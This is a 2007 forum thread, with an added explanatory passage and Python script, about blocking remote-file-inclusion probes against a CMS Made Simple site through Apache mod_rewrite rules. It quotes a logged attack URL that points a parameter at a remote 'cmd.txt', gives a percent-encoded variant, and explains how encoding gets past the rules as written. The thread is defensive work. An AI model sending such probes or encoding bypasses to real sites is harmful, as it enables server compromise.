[solved] How safe is CMSMS against XSS?

General project discussion. NOT for help questions.
SimonSchaufi

[solved] How safe is CMSMS against XSS?

Post by SimonSchaufi »

Hi all!
Since I installed Visitorstats, I can see who is visiting my website. I have a great many visitors who are trying to hack the CMS using cross-site scripting. Most of them are trying to use external URLs as the page alias, like:

http://www.example.org/index.php?page=h ... ml?&cmd=id
or
http://www.example.org/index.php?page=h ... 1/find.jpg

What are they actually trying to do by typing this URL?

If you know how the hackers are trying to hack your site, you can protect your homepage better.
Last edited by SimonSchaufi on Fri Aug 31, 2007 3:18 pm, edited 1 time in total.
Pierre M.

Re: How safe is CMSMS against XSS?

Post by Pierre M. »

Hello,

have a look at the release notes, release announcements or devblog: the coders are doing their best to harden CMSms and avoid potential XSS exploits. For example, if the code cleans page aliases (and other parameters) before using them, you needn't worry about odd aliases.

BTW: do you have mod_rewrite enabled? Odd URLs can be stopped at the webserver level before they reach PHP/CMSms.

Pierre M.
SimonSchaufi

Re: How safe is CMSMS against XSS?

Post by SimonSchaufi »

Yes, I have enabled it, but I don't know how to use mod_rewrite apart from the example that is already included in CMSMS!

Could you give me a link or help me?

Thanks!
Last edited by SimonSchaufi on Wed Aug 22, 2007 10:37 am, edited 1 time in total.
Pierre M.

Re: How safe is CMSMS against XSS?

Post by Pierre M. »

I don't know about VisitorStats.
Have a look at your actual webserver access logs. There should be only nice URLs: w.site.net/some/path/page.html
There is information about URL rewriting in the post-install optional settings.
If you want to filter at the webserver level, please read http://httpd.apache.org/docs/2.2/
And remind us to provide some hardening rules in the next provided .htaccess sample ;)

Pierre M.
SimonSchaufi

Re: How safe is CMSMS against XSS?

Post by SimonSchaufi »

I have not yet found a solution, but I am googling and googling...

I am collecting links for everybody who is interested in the same:

English Links:
http://f0rked.com/articles/mod_rewrite
http://www.workingwith.me.uk/articles/s ... od_rewrite

German links (sorry, but maybe some Germans are coming to this thread because I am German, too ;D):
http://forum.oesterchat.com/phpBB2/viewtopic.php?t=1468
http://www.bsi.de/literat/studien/sistu ... 3.pdf  - page 112

My newest hack attempt was:
/index.php?page=guestbook///oneadmin/config.php?path[docroot]=http://211.155.235.169/sewam/cmd.txt?
Thanks for the visitorstats module! I love it!
Last edited by SimonSchaufi on Thu Aug 30, 2007 10:19 pm, edited 1 time in total.
Pierre M.

Re: How safe is CMSMS against XSS?

Post by Pierre M. »

Hello again,

here are some official mod_rewrite pointers:
http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html
http://httpd.apache.org/docs/2.2/rewrite/
http://httpd.apache.org/docs/2.2/misc/rewriteguide.html
http://httpd.apache.org/docs/2.2/rewrit ... guide.html
http://httpd.apache.org/docs/2.2/rewrit ... anced.html
SimonSchaufi wrote: /index.php?page=guestbook///oneadmin/config.php?path[docroot]=http://211.155.235.169/sewam/cmd.txt?
According to the above links, you can block such requests at the webserver level before they reach PHP/CMSms:

Code:

# have a custom forbidden error message
ErrorDocument 403 /403-forbidden.html

RewriteEngine on

#IF the URI contains a ":"
#(note: %{REQUEST_URI} is the path part only; the query string after "?" is not included)
RewriteCond %{REQUEST_URI} \: [OR]
#OR if the URI contains a "["
RewriteCond %{REQUEST_URI} \[ [OR]
#add as many filters as you want...
RewriteCond %{REQUEST_URI} \]

#THEN whatever the request, don't process it, send a 403.
RewriteRule ^.*$ - [F,L]

#put your usual .htaccess stuff after this line
Maybe this is not usable "as is"; you should tune it according to your context.

Pierre M.
SimonSchaufi

Re: How safe is CMSMS against XSS?

Post by SimonSchaufi »

thank you, thank you, thank you!

For others: if you have pretty URLs enabled, you need to remove the red part!

Well, mine works only with "QUERY_STRING":

Code:

RewriteEngine on

#IF the query string contains "http:"
RewriteCond %{QUERY_STRING} http\: [OR]
#(":" alone could cause problems in the admin area, or if you have installed DokuWiki in a subfolder, for example)

#OR if the query string contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]

#OR if the query string contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]

#OR if the query string contains a "/"
RewriteCond %{QUERY_STRING} \/

#add as many filters as you want...

#THEN whatever the request, don't process it, send a 403.
RewriteRule ^.*$ - [F,L]
Last edited by SimonSchaufi on Mon Sep 03, 2007 7:15 am, edited 1 time in total.
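The two rule sets above differ in one detail that decides whether they fire at all: in mod_rewrite, %{REQUEST_URI} is the decoded path only (the query string after "?" is not part of it), while %{QUERY_STRING} is the raw, still percent-encoded query string. The probe quoted in the thread puts all of its tell-tale characters (the remote URL in path[docroot]=, the brackets, the slashes) into the query string, which is why the QUERY_STRING version matched and the REQUEST_URI version did not. The rules as written are also case-sensitive (no [NC] flag) and see the undecoded string, so an attacker who sends %5B for "[" or HTTP%3A for "http:" slips past them while PHP still decodes the same parameter. The script below is an added example, not code from the thread or from CMSMS: it emulates both rule sets in Python, runs them over the probe from the thread plus a few constructed requests (one percent-encoded variant, a legitimate page, a legitimate page whose query string contains a "/", and a bracketed path), and shows a decoded, case-insensitive variant that closes the encoding gap.

```python
import re
from urllib.parse import unquote

# Patterns transcribed from the two .htaccess snippets in the thread.
# Pierre's set is applied to %{REQUEST_URI}; Simon's to %{QUERY_STRING}.
URI_PATTERNS = [r":", r"\[", r"\]"]
QUERY_PATTERNS = [r"http:", r"\[", r"\]", r"/"]


def split_target(target):
    """Mimic Apache: REQUEST_URI is the percent-decoded path without the
    query string; QUERY_STRING is everything after the first '?' and is
    NOT decoded."""
    path, _sep, query = target.partition("?")
    return unquote(path), query


def uri_rules_block(target):
    """Pierre's rules: any ':' '[' or ']' in REQUEST_URI -> 403."""
    path, _ = split_target(target)
    return any(re.search(p, path) for p in URI_PATTERNS)


def query_rules_block(target):
    """Simon's rules: 'http:' '[' ']' or '/' in QUERY_STRING -> 403.
    Case-sensitive and applied to the raw string, exactly as written."""
    _, query = split_target(target)
    return any(re.search(p, query) for p in QUERY_PATTERNS)


def hardened_query_rules_block(target):
    """Same idea, but decode first and ignore case so that %5B / %3A /
    HTTP: variants are caught as well (this variant is an assumption
    of this example, not something the thread proposes)."""
    _, query = split_target(target)
    decoded = unquote(query)
    return any(re.search(p, decoded, re.IGNORECASE) for p in QUERY_PATTERNS)


# Request targets as they would appear in an access log. The first is the
# probe quoted in the thread; the rest are constructed for this example
# (203.0.113.10 is a documentation address, not a real attacker host).
SAMPLE_TARGETS = [
    "/index.php?page=guestbook///oneadmin/config.php?path[docroot]=http://211.155.235.169/sewam/cmd.txt?",
    "/index.php?page=guestbook%2F%2F%2Foneadmin%2Fconfig.php%3Fpath%5Bdocroot%5D%3DHTTP%3A%2F%2F203.0.113.10%2Fcmd.txt%3F",
    "/index.php?page=contact",
    "/index.php?page=news/2007",
    "/guestbook[1].html",
]


def evaluate(target):
    """Return which of the three rule sets would send a 403 for target."""
    return {
        "uri_rules": uri_rules_block(target),
        "query_rules": query_rules_block(target),
        "hardened": hardened_query_rules_block(target),
    }


if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        v = evaluate(t)
        print(f"{t[:58]:<58} uri={v['uri_rules']!s:<5} "
              f"qs={v['query_rules']!s:<5} hardened={v['hardened']}")
```

Running it shows the three things a practitioner should take from the thread: the quoted probe is only stopped by the QUERY_STRING rules, the percent-encoded twin of that probe is stopped by neither set as written, and the "/" filter also blocks harmless query strings such as page=news/2007, so it needs the same kind of tuning Simon mentions for ":". The Apache equivalent of the hardened function is to list the encoded forms alongside the literal ones (for example `(http:|http%3A|\[|%5B|\]|%5D)`) and add the [NC] flag to the RewriteCond.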
SimonSchaufi

Re: [solved] How safe is CMSMS against XSS?

Post by SimonSchaufi »

OK, one more question, because a little problem came up after this rewrite:

If I type a subdomain, for example:

http://sub.example.org/webmail but the folder doesn't exist, it also tries

http://www.example.org/webmail but I don't want that!

Instead I want a 404 error saying the folder doesn't exist. What must I modify here: RewriteRule ^.*$ - [F,L]
Pierre M.

Re: [solved] How safe is CMSMS against XSS?

Post by Pierre M. »

Hello,

then there is a serious problem in your hosting: A.d.com and B.d.com are separate things.

A request to A.d.com/xyz should never ever "also try" B.d.com/xyz (even if A and B are at the same hosting provider, even as 2 virtual hosts on the same computer).
Just imagine: bank.d.com/checkpassword "also tries" thief.d.com/checkpassword

Computers have no will. If this one "also tries" things, you have configured it to do so. You should fix this ASAP.

Pierre M.
SimonSchaufi

Re: [solved] How safe is CMSMS against XSS?

Post by SimonSchaufi »

OK, I only get a redirect from webmail to the port where the webmail is, but other folders are working properly with an error. Phew.
But I don't know why this redirect is set up.